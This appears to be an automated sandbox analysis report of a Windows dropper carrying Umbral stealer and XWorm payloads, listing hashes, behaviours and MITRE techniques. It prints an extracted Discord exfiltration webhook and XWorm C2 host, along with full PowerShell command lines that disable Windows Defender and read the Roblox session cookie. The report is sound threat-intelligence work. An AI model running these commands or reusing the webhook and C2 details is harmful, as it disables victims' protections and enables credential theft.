Analysis
-
max time kernel
43s -
max time network
53s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
29-12-2024 19:28
Behavioral task
behavioral1
Sample
94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe
Resource
win7-20240903-en
General
-
Target
94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe
-
Size
1.9MB
-
MD5
477ee009f176249987f15c8fd01902f0
-
SHA1
c40e6e81adcca5bf643ea005e3e2bc062793985d
-
SHA256
94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8
-
SHA512
aef7538f615ec5607f56f41f17ad045a4ac8bba6e7a27e185068208a7ea704c01b1b87aaae0b5cb42f2e61ee11dd344e01c2f8d2d089a026e14931935da6dfef
-
SSDEEP
24576:IRDdNQlDWcG0ZbOOdezYwITkHiPIZp7WAvck0poRtf0BJngtcp90kcTFI8A+W4+u:IRDTQRzMKeEcHLZkA0ruJd/
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1322985421172641892/q0_diVrV3tWC0qMrnQumssRXcZ18yaPSUtiPWfKvRg2S6sXoeNRQ-lKC87d8pURrSvkv
Extracted
xworm
5.0
were-breeding.gl.at.ply.gg:1234
ecqG44OAn0ybERsL
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x00070000000173f3-17.dat family_umbral behavioral1/memory/2932-20-0x0000000000380000-0x00000000003C0000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000016edb-16.dat family_xworm behavioral1/memory/2788-19-0x0000000000C50000-0x0000000000C60000-memory.dmp family_xworm -
Umbral family
-
Xworm family
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions KNA SERVICE.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1380 powershell.exe 1056 powershell.exe 2408 powershell.exe 444 powershell.exe 2872 powershell.exe 1084 powershell.exe 300 powershell.exe 580 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts SSS.EXE -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools KNA SERVICE.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion KNA SERVICE.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion KNA SERVICE.EXE -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows defender control.lnk RUN ME.EXE File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows defender control.lnk RUN ME.EXE -
Executes dropped EXE 3 IoCs
pid Process 2704 KNA SERVICE.EXE 2788 RUN ME.EXE 2932 SSS.EXE -
Loads dropped DLL 8 IoCs
pid Process 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 3048 WerFault.exe 3048 WerFault.exe 3048 WerFault.exe 3048 WerFault.exe 3048 WerFault.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 10 discord.com 11 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 7 ip-api.com -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum KNA SERVICE.EXE Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 KNA SERVICE.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 3048 2704 WerFault.exe 30 -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language KNA SERVICE.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2136 cmd.exe 2944 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1316 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2944 PING.EXE -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 2704 KNA SERVICE.EXE 2872 powershell.exe 1380 powershell.exe 2932 SSS.EXE 1056 powershell.exe 1084 powershell.exe 2408 powershell.exe 444 powershell.exe 300 powershell.exe 3040 powershell.exe 2788 RUN ME.EXE 580 powershell.exe 2704 KNA SERVICE.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2788 RUN ME.EXE Token: SeDebugPrivilege 2704 KNA SERVICE.EXE Token: SeDebugPrivilege 2932 SSS.EXE Token: SeIncreaseQuotaPrivilege 2636 wmic.exe Token: SeSecurityPrivilege 2636 wmic.exe Token: SeTakeOwnershipPrivilege 2636 wmic.exe Token: SeLoadDriverPrivilege 2636 wmic.exe Token: SeSystemProfilePrivilege 2636 wmic.exe Token: SeSystemtimePrivilege 2636 wmic.exe Token: SeProfSingleProcessPrivilege 2636 wmic.exe Token: SeIncBasePriorityPrivilege 2636 wmic.exe Token: SeCreatePagefilePrivilege 2636 wmic.exe Token: SeBackupPrivilege 2636 wmic.exe Token: SeRestorePrivilege 2636 wmic.exe Token: SeShutdownPrivilege 2636 wmic.exe Token: SeDebugPrivilege 2636 wmic.exe Token: SeSystemEnvironmentPrivilege 2636 wmic.exe Token: SeRemoteShutdownPrivilege 2636 wmic.exe Token: SeUndockPrivilege 2636 wmic.exe Token: SeManageVolumePrivilege 2636 wmic.exe Token: 33 2636 wmic.exe Token: 34 2636 wmic.exe Token: 35 2636 wmic.exe Token: SeIncreaseQuotaPrivilege 2636 wmic.exe Token: SeSecurityPrivilege 2636 wmic.exe Token: SeTakeOwnershipPrivilege 2636 wmic.exe Token: SeLoadDriverPrivilege 2636 wmic.exe Token: SeSystemProfilePrivilege 2636 wmic.exe Token: SeSystemtimePrivilege 2636 wmic.exe Token: SeProfSingleProcessPrivilege 2636 wmic.exe Token: SeIncBasePriorityPrivilege 2636 wmic.exe Token: SeCreatePagefilePrivilege 2636 wmic.exe Token: SeBackupPrivilege 2636 wmic.exe Token: SeRestorePrivilege 2636 wmic.exe Token: SeShutdownPrivilege 2636 wmic.exe Token: SeDebugPrivilege 2636 wmic.exe Token: SeSystemEnvironmentPrivilege 2636 wmic.exe Token: SeRemoteShutdownPrivilege 2636 wmic.exe Token: SeUndockPrivilege 2636 wmic.exe Token: SeManageVolumePrivilege 2636 wmic.exe Token: 33 2636 wmic.exe Token: 34 2636 wmic.exe Token: 35 2636 wmic.exe Token: SeDebugPrivilege 2872 powershell.exe Token: SeDebugPrivilege 1380 powershell.exe Token: SeDebugPrivilege 1056 powershell.exe Token: SeDebugPrivilege 1084 powershell.exe Token: SeDebugPrivilege 2408 powershell.exe Token: SeDebugPrivilege 444 powershell.exe Token: SeDebugPrivilege 300 powershell.exe Token: SeDebugPrivilege 3040 powershell.exe Token: SeDebugPrivilege 2788 RUN ME.EXE Token: SeIncreaseQuotaPrivilege 1816 wmic.exe Token: SeSecurityPrivilege 1816 wmic.exe Token: SeTakeOwnershipPrivilege 1816 wmic.exe Token: SeLoadDriverPrivilege 1816 wmic.exe Token: SeSystemProfilePrivilege 1816 wmic.exe Token: SeSystemtimePrivilege 1816 wmic.exe Token: SeProfSingleProcessPrivilege 1816 wmic.exe Token: SeIncBasePriorityPrivilege 1816 wmic.exe Token: SeCreatePagefilePrivilege 1816 wmic.exe Token: SeBackupPrivilege 1816 wmic.exe Token: SeRestorePrivilege 1816 wmic.exe Token: SeShutdownPrivilege 1816 wmic.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2788 RUN ME.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2668 wrote to memory of 2704 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 30 PID 2668 wrote to memory of 2704 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 30 PID 2668 wrote to memory of 2704 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 30 PID 2668 wrote to memory of 2704 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 30 PID 2668 wrote to memory of 2788 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 31 PID 2668 wrote to memory of 2788 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 31 PID 2668 wrote to memory of 2788 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 31 PID 2668 wrote to memory of 2788 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 31 PID 2668 wrote to memory of 2932 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 32 PID 2668 wrote to memory of 2932 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 32 PID 2668 wrote to memory of 2932 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 32 PID 2668 wrote to memory of 2932 2668 94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe 32 PID 2704 wrote to memory of 3048 2704 KNA SERVICE.EXE 34 PID 2704 wrote to memory of 3048 2704 KNA SERVICE.EXE 34 PID 2704 wrote to memory of 3048 2704 KNA SERVICE.EXE 34 PID 2704 wrote to memory of 3048 2704 KNA SERVICE.EXE 34 PID 2932 wrote to memory of 2636 2932 SSS.EXE 35 PID 2932 wrote to memory of 2636 2932 SSS.EXE 35 PID 2932 wrote to memory of 2636 2932 SSS.EXE 35 PID 2788 wrote to memory of 2872 2788 RUN ME.EXE 37 PID 2788 wrote to memory of 2872 2788 RUN ME.EXE 37 PID 2788 wrote to memory of 2872 2788 RUN ME.EXE 37 PID 2788 wrote to memory of 1380 2788 RUN ME.EXE 39 PID 2788 wrote to memory of 1380 2788 RUN ME.EXE 39 PID 2788 wrote to memory of 1380 2788 RUN ME.EXE 39 PID 2932 wrote to memory of 2440 2932 SSS.EXE 41 PID 2932 wrote to memory of 2440 2932 SSS.EXE 41 PID 2932 wrote to memory of 2440 2932 SSS.EXE 41 PID 2932 wrote to memory of 1056 2932 SSS.EXE 43 PID 2932 wrote to memory of 1056 2932 SSS.EXE 43 PID 2932 wrote to memory of 1056 2932 SSS.EXE 43 PID 2788 wrote to memory of 2408 2788 RUN ME.EXE 45 PID 2788 wrote to memory of 2408 2788 RUN ME.EXE 45 PID 2788 wrote to memory of 2408 2788 RUN ME.EXE 45 PID 2932 wrote to memory of 1084 2932 SSS.EXE 47 PID 2932 wrote to memory of 1084 2932 SSS.EXE 47 PID 2932 wrote to memory of 1084 2932 SSS.EXE 47 PID 2788 wrote to memory of 444 2788 RUN ME.EXE 49 PID 2788 wrote to memory of 444 2788 RUN ME.EXE 49 PID 2788 wrote to memory of 444 2788 RUN ME.EXE 49 PID 2932 wrote to memory of 300 2932 SSS.EXE 51 PID 2932 wrote to memory of 300 2932 SSS.EXE 51 PID 2932 wrote to memory of 300 2932 SSS.EXE 51 PID 2932 wrote to memory of 3040 2932 SSS.EXE 53 PID 2932 wrote to memory of 3040 2932 SSS.EXE 53 PID 2932 wrote to memory of 3040 2932 SSS.EXE 53 PID 2932 wrote to memory of 1816 2932 SSS.EXE 55 PID 2932 wrote to memory of 1816 2932 SSS.EXE 55 PID 2932 wrote to memory of 1816 2932 SSS.EXE 55 PID 2932 wrote to memory of 2296 2932 SSS.EXE 57 PID 2932 wrote to memory of 2296 2932 SSS.EXE 57 PID 2932 wrote to memory of 2296 2932 SSS.EXE 57 PID 2932 wrote to memory of 2064 2932 SSS.EXE 59 PID 2932 wrote to memory of 2064 2932 SSS.EXE 59 PID 2932 wrote to memory of 2064 2932 SSS.EXE 59 PID 2932 wrote to memory of 580 2932 SSS.EXE 61 PID 2932 wrote to memory of 580 2932 SSS.EXE 61 PID 2932 wrote to memory of 580 2932 SSS.EXE 61 PID 2932 wrote to memory of 1316 2932 SSS.EXE 63 PID 2932 wrote to memory of 1316 2932 SSS.EXE 63 PID 2932 wrote to memory of 1316 2932 SSS.EXE 63 PID 2932 wrote to memory of 2136 2932 SSS.EXE 65 PID 2932 wrote to memory of 2136 2932 SSS.EXE 65 PID 2932 wrote to memory of 2136 2932 SSS.EXE 65 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2440 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe"C:\Users\Admin\AppData\Local\Temp\94a9aea0d58aed1c57e0f3857ea7de65778a6faab1912e4decbe463bf7b85ae8.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Users\Admin\AppData\Local\Temp\KNA SERVICE.EXE"C:\Users\Admin\AppData\Local\Temp\KNA SERVICE.EXE"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Maps connected drives based on registry
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 11403⤵
- Loads dropped DLL
- Program crash
PID:3048
-
-
-
C:\Users\Admin\AppData\Local\Temp\RUN ME.EXE"C:\Users\Admin\AppData\Local\Temp\RUN ME.EXE"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RUN ME.EXE'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RUN ME.EXE'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows defender control'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows defender control'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:444
-
-
-
C:\Users\Admin\AppData\Local\Temp\SSS.EXE"C:\Users\Admin\AppData\Local\Temp\SSS.EXE"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\SSS.EXE"3⤵
- Views/modifies file attributes
PID:2440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SSS.EXE'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:300
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3040
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2296
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:580
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1316
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\SSS.EXE" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:2136 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2944
-
-
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Discovery
Peripheral Device Discovery
1Query Registry
4Remote System Discovery
1System Information Discovery
4System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.5MB
MD5d3fbde93141444735fb5ea06e1371213
SHA1f25eed8c6bf09ba4b1ce60b6ee72d5e36bf9a4f2
SHA256ed8b9422f74d4dc9ec9a55cabedc04c819a13eaeba5b7ddade5e3d5200337816
SHA512553ee6d8ac6d2faa55b0bbb5b97d1ac7cad0dfb1ebf8e2e30f87c881478309a4e0ed0f98285b334ad244be2243ee2b067cb267ce5054ca119d34ae224df65e31
-
Filesize
38KB
MD5816ae2a8f7799541016e947b09286035
SHA1c34cf31168b08a7ae66cafbbbd5570d7d72cab2b
SHA25675a03d5602e8eab0d7013319781dd0b44133fffb50ad5783b5d8224a63265e6d
SHA5127d76cb89386c998e922e38507a931daf4e62a335ff5f1bb9731efd0c1a279efa1ee51bb424f8089b1019dceb2121d379a3f1ef5ab00163a13df6f3efd571039e
-
Filesize
229KB
MD5482265beef9bef7b8def0d9e793a8470
SHA16de3fb6bef13732a226f3b4bcde1c4f8f0b79881
SHA2561da02f46310578bf95267665f964c6c79617e6fd5f3926c53aad40529782750e
SHA5126c6c5d528243895426e7d04ab4fb9af2ce54c7286f25a602e793a034692035c86f832548149d24eee5ce4e4d7f77347361e8ebfe972eb9a826245cff0b7dac8c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5315116efaeebda9ccf2616fe94e37684
SHA1922d6f07ba02cb8def157e6de96472652351cd6f
SHA2562bc61be4147b789c1d424aa1baa18e64fd6c18cdca4091252e7998080ab386ba
SHA5123fac06525ce9525d950cfff93eab4eab174e1f9da254fcaeb142ce62bb115395a5b31a9bed1d5e123dc85d21a3e51838c64387a0620ac3914b6afb6fa737f56f